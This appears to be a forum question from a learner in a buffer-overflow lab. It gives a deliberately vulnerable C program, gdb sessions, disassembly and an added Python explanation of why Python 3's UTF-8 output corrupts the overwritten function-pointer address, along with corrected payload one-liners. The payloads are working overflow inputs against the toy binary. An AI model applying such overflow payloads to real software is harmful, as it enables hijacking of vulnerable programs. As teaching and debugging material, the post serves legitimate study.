Why is my gdb converting to the wrong hex value?


(gdb) run `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Starting program: /home/xxx/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Off to 0x56556155
Program received signal SIGSEGV,Segmentation fault.
0x56556155 in register_tm_clones ()


(gdb) run `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Off to 0x55618dc3
Program received signal SIGSEGV,Segmentation fault.
0x55618dc3 in ?? ()

When I include \x55\x61\x55\x56 in the payload I get a segmentation fault at 0x56556155, but when I include \xcd\x61\x55\x56 in the payload I get a segmentation fault at 0x55618dc3. I was expecting \xcd\x61\x55\x56 to give a segfault at 0x565561cd. I can only reproduce this when using gdb on Arch Linux. On Kali Linux this works as expected and I successfully ran a function by overwriting EBP, but on Arch Linux it does not.

Another example of a payload that does not work:

(gdb) run `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Off to 0x5561aac2
Program received signal SIGSEGV,Segmentation fault.
0x5561aac2 in ?? ()

Source code:

#include <stdio.h>
#include <string.h>

int BUFFER=500;

void win(void){
    /*Win Condition
      We Want to jump here
    */
    printf("\n ===== Win ===== \n\n");
}

void lose(void){
    /* Lose Condition */
    printf("Current Memory Address is %p\n",lose);
    printf("Aim for %p\n",win);
    printf("Lose :(\n");
}

int main(int argc,char* argv[]){
    /* Main Function*/

    //Pointer to the lose function
    void (*fp)(void) = lose;

    char buffer[BUFFER];

    if (argc != 2){
        printf("Overflow the buffer\n");
        printf("Hint! Try `python -c \"print 'A'*100\"`\n");
        return -1;
    }

    //No bounds check: an argv[1] longer than BUFFER runs past buffer and into fp
    memcpy(buffer,argv[1],strlen(argv[1]));
    printf("Off to %p\n",fp);
    fp();

    return 0;
}

Disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   0x56556254 <+0>: lea    ecx,[esp+0x4]
   0x56556258 <+4>: and    esp,0xfffffff0
   0x5655625b <+7>: push   DWORD PTR [ecx-0x4]
   0x5655625e <+10>:    push   ebp
   0x5655625f <+11>:    mov    ebp,esp
   0x56556261 <+13>:    push   edi
   0x56556262 <+14>:    push   esi
   0x56556263 <+15>:    push   ebx
   0x56556264 <+16>:    push   ecx
   0x56556265 <+17>:    sub    esp,0x18
   0x56556268 <+20>:    call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x5655626d <+25>:    add    ebx,0x2d93
   0x56556273 <+31>:    mov    esi,ecx
   0x56556275 <+33>:    mov    eax,esp
   0x56556277 <+35>:    mov    edi,eax
   0x56556279 <+37>:    lea    eax,[ebx-0x2e08]
   0x5655627f <+43>:    mov    DWORD PTR [ebp-0x1c],eax
   0x56556282 <+46>:    mov    eax,DWORD PTR [ebx+0x28]
   0x56556288 <+52>:    lea    edx,[eax-0x1]
   0x5655628b <+55>:    mov    DWORD PTR [ebp-0x20],edx
   0x5655628e <+58>:    mov    edx,eax
   0x56556290 <+60>:    mov    eax,0x10
   0x56556295 <+65>:    sub    eax,0x1
   0x56556298 <+68>:    add    eax,edx
   0x5655629a <+70>:    mov    ecx,0x10
   0x5655629f <+75>:    mov    edx,0x0
   0x565562a4 <+80>:    div    ecx
   0x565562a6 <+82>:    imul   eax,eax,0x10
   0x565562a9 <+85>:    sub    esp,eax
   0x565562ab <+87>:    mov    eax,esp
   0x565562ad <+89>:    add    eax,0x0
   0x565562b0 <+92>:    mov    DWORD PTR [ebp-0x24],eax
   0x565562b3 <+95>:    cmp    DWORD PTR [esi],0x2
   0x565562b6 <+98>:    je     0x565562e3 <main+143>
   0x565562b8 <+100>:   sub    esp,0xc
   0x565562bb <+103>:   lea    eax,[ebx-0x1fb2]
   0x565562c1 <+109>:   push   eax
   0x565562c2 <+110>:   call   0x56556060 <puts@plt>
   0x565562c7 <+115>:   add    esp,0x10
   0x565562ca <+118>:   sub    esp,0xc
   0x565562cd <+121>:   lea    eax,[ebx-0x1f9c]
   0x565562d3 <+127>:   push   eax
   0x565562d4 <+128>:   call   0x56556060 <puts@plt>
   0x565562d9 <+133>:   add    esp,0x10
   0x565562dc <+136>:   mov    eax,0xffffffff
   0x565562e1 <+141>:   jmp    0x5655632e <main+218>
   0x565562e3 <+143>:   mov    eax,DWORD PTR [esi+0x4]
   0x565562e6 <+146>:   add    eax,0x4
   0x565562e9 <+149>:   mov    eax,DWORD PTR [eax]
   0x565562eb <+151>:   sub    esp,0xc
   0x565562ee <+154>:   push   eax
   0x565562ef <+155>:   call   0x56556070 <strlen@plt>
   0x565562f4 <+160>:   add    esp,0x10
   0x565562f7 <+163>:   mov    edx,DWORD PTR [esi+0x4]
   0x565562fa <+166>:   add    edx,0x4
   0x565562fd <+169>:   mov    edx,DWORD PTR [edx]
   0x565562ff <+171>:   sub    esp,0x4
   0x56556302 <+174>:   push   eax
   0x56556303 <+175>:   push   edx
   0x56556304 <+176>:   push   DWORD PTR [ebp-0x24]
   0x56556307 <+179>:   call   0x56556050 <memcpy@plt>
   0x5655630c <+184>:   add    esp,0x10
   0x5655630f <+187>:   sub    esp,0x8
   0x56556312 <+190>:   push   DWORD PTR [ebp-0x1c]
   0x56556315 <+193>:   lea    eax,[ebx-0x1f76]
   0x5655631b <+199>:   push   eax
   0x5655631c <+200>:   call   0x56556040 <printf@plt>
   0x56556321 <+205>:   add    esp,0x10
   0x56556324 <+208>:   mov    eax,DWORD PTR [ebp-0x1c]
   0x56556327 <+211>:   call   eax
   0x56556329 <+213>:   mov    eax,0x0
   0x5655632e <+218>:   mov    esp,edi
   0x56556330 <+220>:   lea    esp,[ebp-0x10]
   0x56556333 <+223>:   pop    ecx
   0x56556334 <+224>:   pop    ebx
   0x56556335 <+225>:   pop    esi
   0x56556336 <+226>:   pop    edi
   0x56556337 <+227>:   pop    ebp
   0x56556338 <+228>:   lea    esp,[ecx-0x4]
   0x5655633b <+231>:   ret
End of assembler dump.


(gdb) disassemble win
Dump of assembler code for function win:
   0x565561cd <+0>: push   ebp
   0x565561ce <+1>: mov    ebp,esp
   0x565561d0 <+3>: push   ebx
   0x565561d1 <+4>: sub    esp,0x4
   0x565561d4 <+7>: call   0x5655633c <__x86.get_pc_thunk.ax>
   0x565561d9 <+12>:    add    eax,0x2e27
   0x565561de <+17>:    sub    esp,0xc
   0x565561e1 <+20>:    lea    edx,[eax-0x1ff8]
   0x565561e7 <+26>:    push   edx
   0x565561e8 <+27>:    mov    ebx,eax
   0x565561ea <+29>:    call   0x56556060 <puts@plt>
   0x565561ef <+34>:    add    esp,0x10
   0x565561f2 <+37>:    nop
   0x565561f3 <+38>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x565561f6 <+41>:    leave
   0x565561f7 <+42>:    ret
End of assembler dump.

(gdb) disassemble lose
Dump of assembler code for function lose:
   0x565561f8 <+0>: push   ebp
   0x565561f9 <+1>: mov    ebp,esp
   0x565561fb <+3>: push   ebx
   0x565561fc <+4>: sub    esp,0x4
   0x565561ff <+7>: call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556204 <+12>:    add    ebx,0x2dfc
   0x5655620a <+18>:    sub    esp,0x8
   0x5655620d <+21>:    lea    eax,[ebx-0x2e08]
   0x56556213 <+27>:    push   eax
   0x56556214 <+28>:    lea    eax,[ebx-0x1fe4]
   0x5655621a <+34>:    push   eax
   0x5655621b <+35>:    call   0x56556040 <printf@plt>
   0x56556220 <+40>:    add    esp,0x10
   0x56556223 <+43>:    sub    esp,0x8
   0x56556226 <+46>:    lea    eax,[ebx-0x2e33]
   0x5655622c <+52>:    push   eax
   0x5655622d <+53>:    lea    eax,[ebx-0x1fc6]
   0x56556233 <+59>:    push   eax
   0x56556234 <+60>:    call   0x56556040 <printf@plt>
   0x56556239 <+65>:    add    esp,0x10
   0x5655623c <+68>:    sub    esp,0xc
   0x5655623f <+71>:    lea    eax,[ebx-0x1fba]
   0x56556245 <+77>:    push   eax
   0x56556246 <+78>:    call   0x56556060 <puts@plt>
   0x5655624b <+83>:    add    esp,0x10
   0x5655624e <+86>:    nop
   0x5655624f <+87>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x56556252 <+90>:    leave
   0x56556253 <+91>:    ret
End of assembler dump.

What am I doing wrong? I am new to assembly and buffer overflows, so please go easy on me.
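An added illustration that is not part of the original question, reproducing the three "Off to" values from the transcript above. It models what `print('A'*524+'\xcd\x61\x55\x56')` actually emits when `python` is Python 3 (as on Arch Linux) versus Python 2 (which the program's own hint, `print 'A'*100`, is written for): in Python 3 the literal is a Unicode str, so `print()` encodes it with the locale codec, and every code point in \x80-\xff becomes a two-byte UTF-8 sequence. The padding length 524 and the addresses 0x565561cd, 0x565561aa and 0x56556155 come from the question; the function names, and the assumption of a UTF-8 locale, are this example's own.

```python
import struct

# Padding before the function pointer, taken from the payloads in the question.
OFFSET = 524


def little_endian_bytes(addr):
    """The four raw bytes that must land at buffer+OFFSET to make fp == addr."""
    return struct.pack("<I", addr)


def payload_str(addr):
    """The str literal the question builds: 'A'*524 + '\\xcd\\x61\\x55\\x56' etc."""
    return "A" * OFFSET + "".join(chr(b) for b in little_endian_bytes(addr))


def printed_by_python2(addr):
    """Python 2: str is already a byte string, so print writes it unchanged.
    (Command substitution strips print's trailing newline, so it is not modelled.)"""
    return payload_str(addr).encode("latin-1")


def printed_by_python3(addr):
    """Python 3: str is Unicode; print() encodes with the locale codec.
    Assumes a UTF-8 locale, so U+00CD -> c3 8d, U+00AA -> c2 aa, ASCII unchanged."""
    return payload_str(addr).encode("utf-8")


def overwritten_fp(argv1):
    """What memcpy(buffer, argv[1], strlen(argv[1])) leaves in fp,
    i.e. the value simplebuffer reports as 'Off to %p'."""
    fp_bytes = argv1[OFFSET:OFFSET + 4]
    return struct.unpack("<I", fp_bytes)[0]


def safe_payload(addr):
    """Fix: stay in bytes end to end and never let str encoding touch the address.
    In the one-liner this is: sys.stdout.buffer.write(b'A'*524 + struct.pack('<I', addr))."""
    return b"A" * OFFSET + struct.pack("<I", addr)


if __name__ == "__main__":
    for addr in (0x56556155, 0x565561cd, 0x565561aa):
        print("target %#x: py2 -> Off to %#x, py3 -> Off to %#x" % (
            addr,
            overwritten_fp(printed_by_python2(addr)),
            overwritten_fp(printed_by_python3(addr)),
        ))
```

Run stand-alone it prints the same mismatch as the transcript: the ASCII-only address 0x56556155 survives under both interpreters, while 0x565561cd and 0x565561aa become 0x55618dc3 and 0x5561aac2 under Python 3 because the UTF-8 lead byte (c3 or c2) shifts the real address bytes one position to the right. Invoking the target as ``./simplebuffer `python2 -c "print('A'*524+'\xcd\x61\x55\x56')"` `` or, on Python 3, ``./simplebuffer `python3 -c "import sys; sys.stdout.buffer.write(b'A'*524+b'\xcd\x61\x55\x56')"` `` keeps the bytes raw.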
